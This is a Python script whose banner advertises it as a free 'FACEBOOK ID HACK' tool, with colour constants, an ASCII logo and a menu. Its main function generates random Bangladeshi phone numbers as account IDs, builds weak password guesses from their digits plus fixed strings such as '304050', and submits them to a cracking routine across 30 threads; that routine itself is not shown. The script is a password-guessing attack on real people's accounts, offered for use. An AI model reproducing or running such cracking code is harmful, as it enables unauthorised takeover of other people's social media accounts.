 #--------------------------(IMPORT BOX)--------------------------#
import os,sys,time,json,random,re,string,platform,base64,uuid
from bs4 import BeautifulSoup as sop
from bs4 import BeautifulSoup
import requests as ress
from datetime import date
from datetime import datetime
from time import sleep
from os import system as s
from time import sleep as waktu
try:
    import requests
    from concurrent.futures import ThreadPoolExecutor as ThreadPool
    import mechanize
    from requests.exceptions import ConnectionError
except ModuleNotFoundError:
    os.system('pip install mechanize requests futures bs4==2 > /dev/null')
    os.system('pip install bs4')
    
    
import os
try:
    import requests
except ImportError:
    print('\n [✓] installing requests !...\n')
    os.system('pip install requests')

try:
    import concurrent.futures
except ImportError:
    print('\n [✓] installing futures !...\n')
    os.system('pip install futures')

try:
    import bs4
except ImportError:
    print('\n [✓] installing bs4 !...\n')
    os.system('pip install bs4')
#--------------------------(COLOUR BOX)--------------------------#    
RED = '\033[1;91m'
WHITE = '\033[1;97m'
GREEN = '\033[1;32m' #
YELLOW = '\033[1;33m'
BLUE = '\033[1;34m'
ORANGE = '\033[1;35m'
P = '\x1b[1;97m' # PUTIH
M = '\x1b[1;91m' # MERAH
H = '\x1b[1;92m' # HIJAU
K = '\x1b[1;93m' # KUNING
B = '\x1b[1;94m' # BIRU
U = '\x1b[1;95m' # UNGU
O = '\x1b[1;96m' # BIRU MUDA
N = '\x1b[0m'    # WARNA MATI
A = '\x1b[1;90m' # WARNA ABU ABU
BN = '\x1b[1;107m' # BELAKANG PUTIH
BBL = '\x1b[1;106m' # BELAKANG BIRU LANGIT
BP = '\x1b[1;105m' # BELAKANG PINK
BB = '\x1b[1;104m' # BELAKANG BIRU
BK = '\x1b[1;103m' # BELAKANG KUNING
BH = '\x1b[1;102m' # BELAKANG HIJAU
BM = '\x1b[1;101m' # BELAJANG MERAH
BA = '\x1b[1;100m' # BELAKANG ABU ABU
now = datetime.now()
dt_string = now.strftime("%H:%M")
current = datetime.now()
ta = current.year
bu = current.month
ha = current.day
today = date.today() 

#--------------------------(LOGO BOX)--------------------------#
logo =("""
  \x1b[38;5;46m ________  _______         __    __   ______    ______   __    __ 
\x1b[38;5;46m/        |/       \       /  |  /  | /      \  /      \ /  |  /  |
\x1b[38;5;46m$$$$$$$$/ $$$$$$$  |      $$ |  $$ |/$$$$$$  |/$$$$$$  |$$ | /$$/ 
\x1b[38;5;46m$$ |__    $$ |__$$ |      $$ |__$$ |$$ |__$$ |$$ |  $$/ $$ |/$$/  
\x1b[38;5;46m$$    |   $$    $$<       $$    $$ |$$    $$ |$$ |      $$  $$<   
\x1b[38;5;46m$$$$$/    $$$$$$$  |      $$$$$$$$ |$$$$$$$$ |$$ |   __ $$$$$  \  
\x1b[38;5;46m$$ |      $$ |__$$ |      $$ |  $$ |$$ |  $$ |$$ \__/  |$$ |$$  \ 
\x1b[38;5;46m$$ |      $$    $$/       $$ |  $$ |$$ |  $$ |$$    $$/ $$ | $$  |
\x1b[38;5;46m$$/       $$$$$$$/        $$/   $$/ $$/   $$/  $$$$$$/  $$/   $$/ 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           
\x1b[38;5;46m⋆\x1b[38;5;254m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\x1b[38;5;50m⋆
\033[1;31m[\033[1;32m=\033[1;31m]  \x1b[38;5;46mDeveloper \033[1;31m● \x1b[38;5;46mPROTIK MONDAL
\033[1;31m[\033[1;32m=\033[1;31m]  \x1b[38;5;46mFacebook  \033[1;31m● \x1b[38;5;46mPROTIK MONDAL
\033[1;31m[\033[1;32m=\033[1;31m]  \x1b[38;5;46mVersion  \033[1;31m ● \x1b[38;5;46m0.10
\033[1;31m[\033[1;32m=\033[1;31m]  \x1b[38;5;46mTools  \033[1;31m   ● \x1b[38;5;46m FACEBOOK ID HACK
\033[1;31m[\033[1;32m=\033[1;31m]  \x1b[38;5;46mType  \033[1;31m    ● \x1b[38;5;46mFREE
\x1b[38;5;50m⋆\x1b[38;5;254m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\x1b[38;5;50m⋆""")

linex=('\x1b[38;5;46m⋆\x1b[38;5;254m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\x1b[38;5;50m⋆')   
#--------------------------(MENU BOX)--------------------------#
class Main:
    def __init__(self):
        self.id = []
        self.ok = []
        self.cp = []
        self.loop = 0
        os.system("clear")
        print(logo)
            # os.system('xdg-openhttps://www.facebook.com/protik.mondal.52459/')
        print('\033[1;31m[\033[1;32m1\033[1;31m]  \x1b[38;5;46m START FACEBOOK ld hack')
        print('\033[1;31m[\033[1;32m2\033[1;31m]  \x1b[38;5;46m EXIT')
        print('\x1b[38;5;46m⋆\x1b[38;5;254m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\x1b[38;5;50m⋆')
        Shorif =input("\033[1;32m[\033[1;32m?\033[1;32m] CHOOSE : ")
        if Shorif in ["1", "01"]:
            v2()
        else:
            exit()
#--------------------------(COLOUR BOX)--------------------------#

A = '\x1b[1;97m' 
B = '\x1b[1;96m' 
C = '\x1b[1;91m' 
D = '\033[38;5;46m'
M = '\033[1;31m'
H = '\033[38;5;46m'
N = '\x1b[1;37m'    
E = '\x1b[1;93m' 
F = '\x1b[1;94m'
G = '\x1b[1;95m'
P = '\033[1;37m'
#--------------------------(CLONING MENU BOX)--------------------------#
def v2():
    user=[]
    os.system('clear')
    print(logo)
    print('[+] BD NUMBER  => 016 017 018 019')
    kode = input('\033[1;32m[\033[1;32m?\033[1;32m] SIM CODE : ')
    kodex = ''.join(random.choice(string.digits) for _ in range(2))
    kod = ''.join(random.choice(string.digits) for _ in range(2))
    print('[+] 500. 2000. 5000. 10000. 15000. 50000')
    limit = int(input('[?] ENTER YOUR CRACK LIMIT : '))
    for nmbr in range(limit):
        nmp = ''.join(random.choice(string.digits) for _ in range(4))
        user.append(nmp)
    with ThreadPool(max_workers=30) as akash:
        os.system('clear')
        print(logo)
        tl = str(len(user))
        print('\033[1;31m[\033[1;32m=\033[1;31m]\x1b[38;5;46m SIM CODE : '+kode)
        print('\033[1;31m[\033[1;32m=\033[1;31m]\x1b[38;5;46m CRACK ID : '+tl)
        print('\x1b[38;5;46m⋆\x1b[38;5;254m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\x1b[38;5;50m⋆')
        for guru in user:
            uid = kode+kodex+kod+guru
            pwx = [kode+kodex+kod+guru,kod+guru,kodex+guru,kode+kodex+kod,'304050','607080']
            akash.submit(rcrack1,uid,pwx,tl)
    print(linex)
    print('\033[1;37m[\033[1;32m~\033[1;37m] CRACK SUCCESSFULLY COMPLETED..')
    print(linex)
